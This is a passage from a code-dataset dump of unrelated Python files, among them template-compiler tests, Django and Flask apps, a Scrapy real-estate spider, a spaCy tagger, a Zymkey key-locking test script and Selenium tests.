__piglet_rtdata.context[-1]\\n\"\n \" x = 'foo'\\n\"\n )\n\n def test_it_doesnt_rewrite_loop_vars(self):\n mod = ast.parse(\"def foo():\\n\" \" for x in []: pass\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" for x in []:\\n\"\n \" pass\\n\"\n )\n\n def test_it_doesnt_rewrite_func_args(self):\n mod = ast.parse(\"def foo(x=None):\\n\" \" yield x\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo(x=None):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" (yield x)\\n\"\n )\n\n def test_it_isnt_confused_by_earlier_function_args(self):\n mod = ast.parse(\"def a(foo): \\n\" \" pass\\n\" \"def b():\\n\" \" a(foo)\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def a(foo):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" pass\\n\"\n \"\\n\"\n \"def b():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" foo = __piglet_ctx.get('foo', __piglet_rt.Undefined('foo'))\\n\"\n \" a(foo)\\n\"\n )\n\n def test_it_defaults_builtins(self):\n mod = ast.parse(\"def foo():\\n\" \" yield id\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert 
astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" id = __piglet_ctx.get('id', __piglet_rt.builtins.id)\\n\"\n \" (yield id)\\n\"\n )\n\n def test_it_isnt_confused_by_argument_defaults(self):\n mod = ast.parse('def foo(bar=\"x\".upper):\\n' \" bar()\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo(bar='x'.upper):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" bar()\\n\"\n )\n\n def test_it_doesnt_rewrite_function_refs(self):\n mod = ast.parse(\n \"def foo():\\n\" \" return bar()\\n\" \"def bar():\\n\" \" return foo\\n\"\n )\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" return bar()\\n\"\n \"\\n\"\n \"def bar():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" return foo\\n\"\n )\n\n def test_it_handles_name_on_both_sides_of_assigment(self):\n mod = ast.parse(\"def foo():\\n\" \" bar = bar\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" bar = __piglet_ctx.get('bar', __piglet_rt.Undefined('bar'))\\n\"\n \" bar = bar\\n\"\n )\n\n\ndef test_it_doesnt_autoescape_in_cdata():\n t = Template(\"\")\n assert t.render({\"x\": \"<&>\"}) == \"\"\n","sub_path":"venv/Lib/site-packages/piglet/test_piglet.py","file_name":"test_piglet.py","file_ext":"py","file_size_in_byte":24789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504644376","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nfrom itertools import chain\n\nfrom places.models import Hotel, Cafe\n\nclass SavedPlaces(models.Model):\n \"\"\"Model for saved places.\"\"\"\n\n saved_hotels = models.ForeignKey(Hotel, on_delete=models.CASCADE)\n saved_cafes = models.ForeignKey(Cafe, on_delete=models.CASCADE)\n\n\n @staticmethod\n def save_place(username, place_name):\n ids_places = Hotel.objects.values_list('id', flat=True).filter(name=place_name)\n\n if len(ids_places) == 0:\n ids_places = Cafe.objects.values_list('id', flat=True).filter(name=place_name)\n places_queryset = Cafe.objects.filter(pk__in=set(ids_places))\n else:\n places_queryset = Hotel.objects.filter(pk__in=set(ids_places))\n\n place_object = places_queryset.filter(name=place_name).last()\n user_save = place_object.users_saved.filter(username=username)\n user = User.objects.filter(username=username)\n if len(user_save) == 0:\n place_object.users_saved.set(user)\n place_object.save()\n return True\n else:\n return False\n\n\n @staticmethod\n def show_place(username):\n id_user = User.objects.values_list('id', flat=True).filter(username=username).last()\n hotels_queryset = Hotel.objects.filter(users_saved=id_user)\n cafes_queryset = Cafe.objects.filter(users_saved=id_user)\n saved_places = list(chain(hotels_queryset, cafes_queryset))\n return saved_places","sub_path":"city_project/save_places_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"73242668","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_splash import SplashRequest\nfrom ..items import RealestateItem\n\n\nclass 
GetEstateInfoSpider(scrapy.Spider):\n name = \"get_estate_info\"\n allowed_domains = [\"suumo.jp\"]\n start_urls = (\n 'http://suumo.jp/',\n )\n\n '''スクレイピング開始'''\n\n '''都道府県エリア選択ページからエリア名を取得後、遷移'''\n def parse(self, response):\n for area in response.css('a.areabox-link'):\n item = RealestateItem()\n # エリア名を取得\n str_area = area.css('div.areabox-title::text').extract_first()\n item['area'] = str_area\n # リンク先を取得\n href = area.css('::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_chintai, meta={'item': item})\n\n '''都道府県エリアごとの賃貸ページに遷移'''\n def parse_to_chintai(self, response):\n item = response.meta['item']\n # 賃貸ページのみを取得\n if response.css('a.ui-btn.ui-btn--base.areamenu-btn::text').extract_first() == '賃貸物件':\n href = response.css('a.ui-btn.ui-btn--base.areamenu-btn::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_pref, meta={'item': item})\n\n '''都道府県ごとのページに遷移'''\n def parse_to_pref(self, response):\n # 都道府県名を取得\n for pref in response.css('dt.areabox-title'):\n item = {}\n # item = RealestateItem()\n str_pref = pref.css('a::text').extract_first()\n item[str_pref] = response.meta['item']\n item[str_pref]['pref'] = str_pref\n # リンク先を取得\n href = pref.css('a::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定\n yield scrapy.Request(next_page, callback=self.parse_to_ensen,# meta={'item': item})\n meta={'id': str_pref, 'item:' + str_pref: item[str_pref]})\n # request.meta['item'] = item\n # # リンク先に遷移\n # yield request\n # return scrapy.Request(next_page, callback=self.parse_to_ensen), str_pref\n\n '''沿線検索のページに遷移'''\n def parse_to_ensen(self, response):\n # 前のparserからitemを取得\n item = {}\n # item = RealestateItem()\n id = response.meta['id']\n item[id] = response.meta['item:' + id]\n # item = response.meta['item']\n # 沿線検索ページのみを取得(エリアページは取得しない)\n href = response.css('ul.itemlist_group li a::attr(href)').extract()\n # l_href = href.split('/')\n for i in href:\n l_href = i.split('/')\n if l_href[len(l_href) - 2] == 'ensen':\n next_page = response.urljoin(i)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_eki, # meta = {'item': item})\n meta = {'id': id, 'item:' + id: item})\n # return scrapy.Request(next_page, callback=self.parse_to_eki)\n\n '''路線ごとの駅名検索のページに遷移'''\n def parse_to_eki(self, response):\n # 前のparserからitemを取得\n item = RealestateItem()\n id = response.meta['id']\n item[id] = response.meta['item:' + id]\n # item = response.meta['item']\n for line in response.css('ul.searchitem-list li label'):\n # 路線名を取得\n str_line = line.css('a::text').extract_first()\n item['line'] = str_line\n # # リンクを取得\n # href = line.css('a::attr(href)').extract_first()\n # next_page = response.urljoin(href)\n # # 次のparserに渡す変数を設定\n # request = scrapy.Request(next_page, callback=self.parse_estate)\n # request.meta['item'] = item\n # # リンク先に遷移\n # yield request\n # # yield scrapy.Request(next_page, callback=self.parse_estate)\n yield item\n #\n # # 駅ごとの物件情報をスクレイピング\n # def parse_estate(self, response):\n # # 沿線検索ページのみを取得(エリアページは取得しない)\n # href = response.css('ul.searchitem-list li label span::text').extract()\n # item = RealestateItem()\n # item['pref'] = str_pref\n # item['area'] = str_area\n # # item['city'] =\n # item['line'] = str_line # 鉄道路線\n # item['station'] = response.css('ul.searchitem-list li label span::text').extract_first() 
# 駅名\n # # item['access'] # 駅からの距離\n # # item['apartment_type'] # 物件タイプ(アパート、マンション、その他)\n # # item['price']\n # # item['kanrihi']\n # # item['sikikin']\n # # item['reikin']\n # # item['size'] # 専有面積\n # # item['madori']\n # # item['year_built']\n # return item\n","sub_path":"build/lib/RealEstate/spiders/get_estate_info.py","file_name":"get_estate_info.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"279487778","text":"import sys\n\ndef pascal(k,N):\n if N == 1:\n print('1')\n return\n if N == 2:\n print('1')\n print('1 1')\n return\n if k <= 1:\n k += 1\n print('1 '* k)\n pascal(k+1,N)\n elif k == N:\n b = ['1'] + [str(k-1)] * (k-2) + ['1']\n a = ' '.join(b)\n print(a)\n return \n else:\n b = ['1'] + [str(k-1)] * (k-2) + ['1']\n a = ' '.join(b)\n print(a)\n pascal(k+1,N)\n\n\nsys.stdin = open('input6.txt','r')\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n print('#{}'.format(tc))\n pascal(0,N)\n","sub_path":"9월/0903/파스칼의 삼각형.py","file_name":"파스칼의 삼각형.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"94330070","text":"from channel import Server\n\nimport json\n\nimport gevent\nimport redis\n\nfrom gevent import monkey\nmonkey.patch_all()\n\n\nr = redis.StrictRedis(decode_responses=True)\nchannel = Server('channel1', r)\n\n\ndef handle_req(_id, _value):\n\n # process the message\n values = json.loads(_value)\n\n # send response\n channel.send_rsp(_id, json.dumps({\n \"cnt\": str(values['cnt']),\n \"msg\": values['data'] + '_processed'\n }))\n\n # acknowledge message\n channel.ack_req(_id)\n\n return True\n\n\nprint('serving ...')\nwhile True:\n\n # receive the message\n req_id, req = channel.recv_req()\n\n # handle the message\n if not gevent.spawn(handle_req, req_id, req):\n break\n","sub_path":"test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"625876961","text":"from app.main import bp\nfrom app import db\nfrom flask import render_template, flash, redirect, url_for, request, send_file, session, current_app\n\nfrom app.main.forms import ContactForm, auditaideForm\nfrom app.models import User\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nfrom app.models import User\nfrom app.email import send_email\nfrom threading import Thread\nfrom app.main.utils import keywords, duration, oddTimes, noteLength, duplicate_notes, overlapping_notes, non_contiguous, start_time, end_time, test_file_for_blanks, test_file_for_expected_types, total_duration, total_duration_per_day, keywords_inverse\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.writer.excel import save_virtual_workbook\nfrom app.main.email import send_contact_email\n\nalhpa_list = []\n\n@bp.route('/')\n@bp.route('/index')\ndef index():\n return render_template('index.html', title='Home')\n\ndef allowed_file(filename):\n ALLOWED_EXTENSIONS = set(['xlsx', 'xls'])\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@bp.route('/auditaide', methods=['GET','POST'])\n@login_required\ndef edit_auditaide():\n form = auditaideForm()\n if form.validate_on_submit():\n current_user.keywords = form.keywords.data\n current_user.high_duration = form.high_duration.data\n current_user.low_duration = form.low_duration.data\n current_user.note_length = form.note_length.data\n current_user.start_time_before = form.start_time_before.data\n current_user.start_time_after = form.start_time_after.data\n current_user.end_time_before = form.end_time_before.data\n current_user.end_time_after = form.end_time_after.data\n db.session.commit()\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n webfile = request.files['file']\n else:\n flash('Choose xlsx or xls files only')\n return redirect(request.url)\n trngfile = load_workbook(webfile) #read_only=True slows down\n ### --- Variables to pass to functions in utils.py --- ###\n ws = trngfile.active\n\n pass_test_for_blanks, msg_blanks = test_file_for_blanks(ws)\n pass_test_for_chars, msg = test_file_for_expected_types(ws)\n \n if pass_test_for_chars and pass_test_for_blanks:\n results_list = [] # This should be passed from function to function, then written to final Xlsx file.\n html_keyword = request.form['keywords']\n my_list0 = html_keyword.split(\",\")\n my_list = [x.strip().lower().replace('?',' ') for x in my_list0]\n start_time_before= request.form['start_time_before'] # strings of 09:00 or 14:30\n start_time_after=request.form['start_time_after']\n end_time_before= request.form['end_time_before'] # strings of 09:00 or 14:30\n end_time_after=request.form['end_time_after']\n highduration = int(request.form['high_duration'])\n lowduration = int(request.form['low_duration'])\n note_length = int(request.form['note_length'])\n ### --- END Variables to pass to functions in utils.py --- ###\n try:\n start_hour_before = int(start_time_before.split(\":\")[0])\n start_min_before = int(start_time_before.split(\":\")[1])\n start_hour_after = int(start_time_after.split(\":\")[0])\n start_min_after = int(start_time_after.split(\":\")[1])\n except:\n pass\n try:\n end_hour_before = int(end_time_before.split(\":\")[0])\n end_min_before = int(end_time_before.split(\":\")[1])\n end_hour_after = int(end_time_after.split(\":\")[0])\n end_min_after = int(end_time_after.split(\":\")[1])\n except:\n pass\n \n if request.form.get('keywordsbool'):\n if not request.form.get('keywordsinversebool'):\n keywords(ws, my_list, results_list)\n else:\n keywords_inverse(ws, my_list, results_list)\n if request.form.get('durationsbool'):\n duration(ws, highduration, lowduration, results_list)\n if request.form.get('note_lengthbool'):\n noteLength(ws, note_length, results_list)\n if request.form.get('duplicatesbool'):\n duplicate_notes(ws, results_list)\n if request.form.get('overlappingbool'):\n overlapping_notes(ws, results_list)\n if request.form.get('noncontigbool'):\n non_contiguous(ws, results_list)\n if request.form.get('start_time_bool'):\n start_time(ws, start_hour_before, start_min_before, start_hour_after, start_min_after, results_list)\n if request.form.get('end_time_bool'):\n end_time(ws, end_hour_before, end_min_before, end_hour_after, end_min_after, results_list)\n if request.form.get('dailytotaldurationbool'):\n 
total_duration_per_day(ws, results_list)\n            if request.form.get('totaldurationbool'):\n                total_duration(ws, results_list)\n\n            from operator import itemgetter\n            alpha_list = sorted(results_list, key=itemgetter(1))  # sort the nested results by index 1 (the individual's name)\n\n            flash(u'Your changes have been saved.', 'Success')\n            return render_template(\"results.html\", alpha_list=alpha_list)  # here's the problem!\n            # session['my_list'] = alpha_list\n            # return redirect(url_for('results'))\n\n        else:\n            flash(msg + msg_blanks, 'Error')\n\n        return render_template('auditaide.html', title='Scan', form=form)\n\n    elif request.method == 'GET':\n        # form.username.data = current_user.username\n        form.keywords.data = current_user.keywords\n        form.high_duration.data = current_user.high_duration\n        form.low_duration.data = current_user.low_duration\n        form.note_length.data = current_user.note_length\n        form.start_time_before.data = current_user.start_time_before\n        form.start_time_after.data = current_user.start_time_after\n        form.end_time_before.data = current_user.end_time_before\n        form.end_time_after.data = current_user.end_time_after\n        return render_template('auditaide.html', title='Scan', form=form)\n\n\n@bp.route('/features')\ndef features():\n    return render_template('features.html', title='auditaide - Features')\n\n@bp.route('/pricing')\ndef pricing():\n    return render_template('pricing.html', title='auditaide - Pricing')\n\n\n@bp.route('/contact', methods=['GET', 'POST'])\ndef contact():\n    form = ContactForm()\n    if request.method == 'POST':\n        if not form.validate_on_submit():\n            flash('All fields are required.')\n            return render_template('contact.html', form=form)\n        else:\n            msg = \"\"\"\n            From: %s <%s>\n            %s, %s\n            \"\"\" % (form.name.data, form.email.data, form.message.data, form.organization.data)\n            msgHtml = \"Hello
\"\n send_contact_email(form.organization.data, sender=current_app.config['ADMINS'][0],recipients=['mnoah66@gmail.com'], text_body=msg)\n return render_template('contact.html', success=True)\n \n \n elif request.method == 'GET':\n return render_template('contact.html', form=form)\n","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"255755484","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\n\"\"\"\nThis module provides classes for the Piezoelectric tensor\n\"\"\"\nfrom pymatgen.core.tensors import Tensor\nimport numpy as np\nimport warnings\n\n__author__ = \"Shyam Dwaraknath\"\n__copyright__ = \"Copyright 2016, The Materials Project\"\n__version__ = \"1.0\"\n__maintainer__ = \"Shyam Dwaraknath\"\n__email__ = \"shyamd@lbl.gov\"\n__status__ = \"Development\"\n__date__ = \"Feb, 2016\"\n\n\nclass PiezoTensor(Tensor):\n \"\"\"\n This class describes the 3x6 piezo tensor in Voigt-notation\n \"\"\"\n\n def __new__(cls, input_array, tol=1e-3):\n \"\"\"\n Create an PiezoTensor object. The constructor throws an error if\n the shape of the input_matrix argument is not 3x3x3, i. e. in true\n tensor notation. Note that the constructor uses __new__ rather than\n __init__ according to the standard method of subclassing numpy\n ndarrays.\n\n Args:\n input_matrix (3x3x3 array-like): the 3x6 array-like\n representing the piezo tensor\n \"\"\"\n obj = super(PiezoTensor, cls).__new__(cls, input_array, check_rank=3)\n if not (obj - np.transpose(obj, (0, 2, 1)) < tol).all():\n warnings.warn(\"Input piezo tensor does \"\n \"not satisfy standard symmetries\")\n return obj.view(cls)\n","sub_path":"pymatgen/analysis/piezo.py","file_name":"piezo.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"610728379","text":"from django.http import JsonResponse\n\n\n# Create your views here.\n\ndef index(request):\n data = {\n 'Name' : 'Peter Godoy',\n 'Track' : 'Backend(Python)',\n 'Message' : 'Hi, mentor, you are doing a great job, thank you so much for the opportunity.'\n}\n return JsonResponse(data)\n\n","sub_path":"mysite/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"367141628","text":"from flask import *\nfrom whitenoise import WhiteNoise\napp = Flask(__name__, template_folder=\"./\")\napp.wsgi_app = WhiteNoise(app.wsgi_app,\n root='static/',\n prefix='static/',\n index_file='index.htm',\n autorefresh=True)\n\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338203782","text":"#! 
/bin/python3\n\nimport en_core_web_lg\nimport json\nimport wikipedia\nimport datetime\nimport warnings\nwarnings.filterwarnings('ignore')\n\nnlp = en_core_web_lg.load()\n\n\nclass Tagger(object):\n\n def __init__(self, string):\n self.string_ = string\n self.okr = nlp(string)\n self.special_words = ['Grephy', 'grephy',\n 'OKR', 'okr', 'user', 'User', 'API']\n self.now = str(datetime.datetime.now())\n\n def process(self):\n self.nodes = {}\n self.edges = {}\n self.properties = {}\n self.output = {}\n\n # nodes based on nouns\n for word in self.okr:\n if word.like_url:\n word.tag_, word.dep_ = 'URL', 'URL'\n self.nodes[str(word)] = 'URL'\n elif word.dep_ == 'dobj' or word.dep_ == 'compound' or word.dep_ == 'pobj' or word.dep_ == 'nsubj':\n self.nodes[str(word)] = 'THING'\n\n # nodes updated to reflect named entities\n named_entities = {}\n for ent in self.okr.ents:\n if ent.text is False:\n named_entities[str(ent)] = (str(ent.label_))\n\n # custom filter to make sure named_entities doesn't overwrite important preset labels.\n for word in named_entities:\n if self.nodes[word] == 'URL':\n named_entities[word] = 'URL'\n\n # combines the named entity nodes with the noun self.nodes\n self.nodes.update(named_entities)\n\n # combines the events found by the entity extractor\n try:\n self.nodes.update(self.entity_extractor())\n except:\n pass\n\n # hardcoded meanings\n if 'Grephy' in self.nodes:\n self.nodes['Grephy'] = 'PRODUCT'\n if 'grephy' in self.nodes:\n self.nodes['grephy'] = 'PRODUCT'\n if 'OKR' in self.nodes:\n self.nodes['OKR'] = 'OBJECTIVE'\n if 'okr' in self.nodes:\n self.nodes['okr'] = 'OBJECTIVE'\n if 'user' in self.nodes:\n self.nodes['user'] = 'PERSON'\n if 'User' in self.nodes:\n self.nodes['User'] = 'PERSON'\n if 'API' in self.nodes:\n self.nodes['API'] = 'SOFTWARE'\n\n # Edges for graph, establishes relationships\n for word in self.okr:\n if word.tag_ == 'VBZ' or word.dep_ == 'conj' or word.dep_ == 'ROOT':\n self.edges[str(word.lemma_)] = ('ACTION')\n\n self.properties.update(self.nodes)\n self.properties.update(self.edges)\n self.properties.update(self.recommended_actions())\n # self.properties.update(self.suggested_links())\n self.output.update(self.okr_id())\n return self.output\n\n def okr_id(self):\n okr = {\n 'tags': {\n 'Objective': str(self.okr),\n 'Results': {},\n 'UUID': self.now,\n 'Properties': self.properties\n }\n }\n return json.loads(json.dumps(okr))\n\n # Suggestion generator DISABLED ABOVE\n def entity_extractor(self):\n entities = []\n for word in range(len(self.okr)):\n if str(self.okr[word]) not in self.special_words:\n if self.okr[word].dep_ == 'pobj' and self.okr[word].pos_ != 'NUM':\n entities.insert(0, [str(self.okr[word])])\n if self.okr[word - 1].dep_ == 'compound' or self.okr[word - 1].dep_ == 'nummod' or self.okr[word - 1].dep_ == 'prep':\n entities[0].insert(0, str(self.okr[word - 1]))\n if self.okr[word - 2].dep_ == 'compound' or self.okr[word - 2].dep_ == 'nummod' or self.okr[word - 2].dep_ == 'pobj':\n entities[0].insert(0, str(self.okr[word - 2]))\n if self.okr[word - 3].dep_ == 'compound' or self.okr[word - 3].dep_ == 'nummod':\n entities[0].insert(0, str(self.okr[word - 3]))\n try:\n for i in range(5):\n if self.okr[word + i].pos_ == 'NUM' and self.okr[word + i].dep_ == 'pobj':\n entities[0].insert(0, str(self.okr[word + i]))\n except:\n continue\n\n if self.okr[word].dep_ == 'pcomp':\n entities[0].insert(0, str(self.okr[word]))\n\n for i in range(len(entities)):\n entities[i] = ' '.join(entities[i])\n\n nodes = {}\n for i in entities:\n if i in 
self.nodes:\n return\n else:\n nodes[i] = 'SUGGESTION'\n\n list_ = []\n for i in entities:\n list_.append(i)\n list_ = ' '.join(list_)\n nodes[list_] = 'SUGGESTION'\n\n return json.loads(json.dumps(nodes))\n\n def recommended_actions(self):\n verb_to_noun = {\n 'predict': 'prediction',\n 'plan': 'plan',\n 'decide': 'decision'\n }\n verbs = {'build', 'organize', 'develop'}\n recs = {}\n for action in self.edges:\n if action.lower() in verb_to_noun:\n word = verb_to_noun[action.lower()]\n recs['question_for_user'] = 'Do you want to make a {}?'.format(\n word)\n elif action.lower() in verbs:\n recs['question_for_user'] = 'Do you want to {} something?'.format(\n action.lower())\n return json.loads(json.dumps(recs))\n\n def suggested_links(self):\n links = {}\n for i, node in enumerate(self.nodes):\n if self.nodes[node] != 'URL':\n try:\n links['link_{}'.format(i)] = wikipedia.page(node).url\n except:\n pass\n return json.loads(json.dumps(links))\n\n\n# string = \"Generative adversarial networks (GANs) are an expressive class of neural generative models with tremendous success in modeling high-dimensional continuous measures. In this paper, we present a scalable method for unbalanced optimal transport (OT) based on the generative-adversarial framework. We formulate unbalanced OT as a problem of simultaneously learning a transport map and a scaling factor that push a source measure to a target measure in a cost-optimal manner. In addition, we propose an algorithm for solving this problem based on stochastic alternating gradient updates, similar in practice to GANs. We also provide theoretical justification for this formulation, showing that it is closely related to an existing static formulation by Liero et al. (2018), and perform numerical experiments demonstrating how this methodology can be applied to population modeling.\"\n# print(Tagger(string).process())\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"586609579","text":"#!/usr/bin/python3\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nimport zymkey\nimport base64\nimport sys\nimport json\n\n# pass the ciphertext file as argument to script 1: aes cipher, 2: hmac cipher\nciphertext_rsa = open(sys.argv[1]).read()\nciphertext_hmac = open(sys.argv[2]).read()\n\n#Decrypt secret key with RSA private key\nkey_d = RSA.importKey(open('private_key.pem').read())\ncipher_d = PKCS1_OAEP.new(key_d)\nmessage_rsa = cipher_d.decrypt(base64.b64decode(ciphertext_rsa))\nmessage_hmac = cipher_d.decrypt(base64.b64decode(ciphertext_hmac))\n\n#Lock the aes secret to the zymkey\nencrypted_f = open(\"zymkey_protected_secret_aes.dat\", mode='wb')\nlocked_data = zymkey.client.lock(message_rsa)\nencrypted_f.write(base64.b64encode(locked_data))\nencrypted_f.close()\n\n#Lock the hmac secret to the zymkey\nencrypted_f = open(\"zymkey_protected_secret_hmac.dat\", mode='wb')\nlocked_data = zymkey.client.lock(message_hmac)\nencrypted_f.write(base64.b64encode(locked_data))\nencrypted_f.close()\n\n# AES key in locked form, unlock for test\ncontent_aes = bytearray(open(\"zymkey_protected_secret_aes.dat\", mode=\"rb\").read())\nprint(\"Locked AES key: \")\nprint(content_aes)\nsecret_key_aes = zymkey.client.unlock(base64.b64decode(content_aes))\nprint(\"AES key: \")\nprint(secret_key_aes)\n\n# hmac key in locked form, unlock for test\ncontent_hmac = 
bytearray(open(\"zymkey_protected_secret_hmac.dat\", mode=\"rb\").read())\nprint(\"Locked HMAC key: \")\nprint(content_hmac)\nsecret_key_hmac = zymkey.client.unlock(base64.b64decode(content_hmac))\nprint(\"HMAC key: \")\nprint(secret_key_hmac)\n\n\n#print(secret_key.decode(\"utf-8\"))\n#secret_key_b = bytes(secret_key.decode(\"utf-8\"), \"utf-8\")","sub_path":"test_scripts/encryption_tests/rsa_decrypt_secret_zymkeylock.py","file_name":"rsa_decrypt_secret_zymkeylock.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"528503022","text":"from selenium.webdriver.common.keys import Keys\nfrom unittest import skip\nfrom .base import FunctionalTest\n\n\nclass ItemValidationTest(FunctionalTest):\n\n def get_error_element(self):\n return self.browser.find_element_by_css_selector('.has-error')\n\n\n\n def test_cannot_add_duplicate_items(self):\n # user goes to start a new list\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys(\"repeat 1\")\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table(\"1: repeat 1\")\n\n # user accidently tries to enter a duplicate item\n self.get_item_input_box().send_keys('repeat 1')\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # user sees a helpful error message\n self.wait_for(lambda: self.assertEqual(\n self.get_error_element().text,\n \"You've already got this in your list\"\n ))\n\n\n def test_cannot_add_empty_list_items(self):\n # user 1 got to home page and accidently adds a blank item\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # page refreshes, gives error saying list item cannot be blank\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n\n # tries again with text in field and error disapperats\n self.get_item_input_box().send_keys('item 1')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n\n # can submit\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: item 1')\n\n # stupidly, user tries another blank item\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n # receives a similar warning\n self.wait_for_row_in_list_table('1: item 1')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:invalid'\n ))\n\n # she can correct by filling in some text\n self.get_item_input_box().send_keys('not blank')\n self.wait_for(lambda: self.browser.find_elements_by_css_selector(\n '#id_text:valid'\n ))\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: item 1')\n self.wait_for_row_in_list_table('2: not blank')\n\n\n def test_error_messages_are_cleared_on_input(self):\n\n # user starts a list and causes a validation error\n self.browser.get(self.live_server_url)\n self.get_item_input_box().send_keys('repeat')\n self.get_item_input_box().send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: repeat')\n self.get_item_input_box().send_keys('repeat')\n self.get_item_input_box().send_keys(Keys.ENTER)\n\n self.wait_for(lambda: self.assertTrue(\n self.get_error_element().is_displayed()\n ))\n\n # user starts typing in input box to clear error\n self.get_item_input_box().send_keys('a')\n\n # user sees error go away\n self.wait_for(lambda: self.assertFalse(\n self.get_error_element().is_displayed()\n 
